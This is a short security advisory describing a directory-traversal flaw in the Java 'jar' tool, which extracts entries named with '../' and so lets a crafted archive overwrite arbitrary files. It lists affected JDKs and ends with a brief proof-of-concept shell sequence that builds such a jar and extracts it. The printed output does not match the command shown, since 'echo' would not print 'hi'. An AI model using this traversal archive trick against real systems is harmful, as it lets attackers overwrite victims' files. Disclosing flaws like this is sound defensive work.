‘Jar Tool Directory Transversal Vulnerability’

Summary

‘Jar is ‘a Java archiving and compression application, which is part of many Java development kits. It was designed mainly to facilitate the packaging of Java applets or applications into a single archive’.

The Jar tool does not check properly if the files to be extracted have the string ‘../’ on its names, so it’s possible for an attacker to create a malicious jar file in order to overwrite arbitrary files within the file system.’

Credit:

‘The information has been provided by Pluf.’


Details

Affected Software:
The following Java development kits have been tested and contain the vulnerability, but maybe others kits and/or platforms could be affected by the same:
 * SUN:
    Sun’s J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
    Sun’s J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)

 * IBM:
    IBM Java Development Kit 1.4.2 Linux

 * BEA:
    BEA WebLogic’s J2SE Development Kit, version 1.5.0 (Linux and Windows version)

 * BLACKDOWN:
    Blackdown Java Development Kit 1.4.2 Linux

Exploit:
A malicious jar file can be created as follows:

java4fun# echo hi > /tmp/test
java4fun# jar cvf trash.jar *.class ../../../../../../../tmp/test
java4fun# rm /tmp/test
java4fun# jar xvf trash.jar (no overwrite message displayed)
java4fun# echo /tmp/test
hi

Categories: News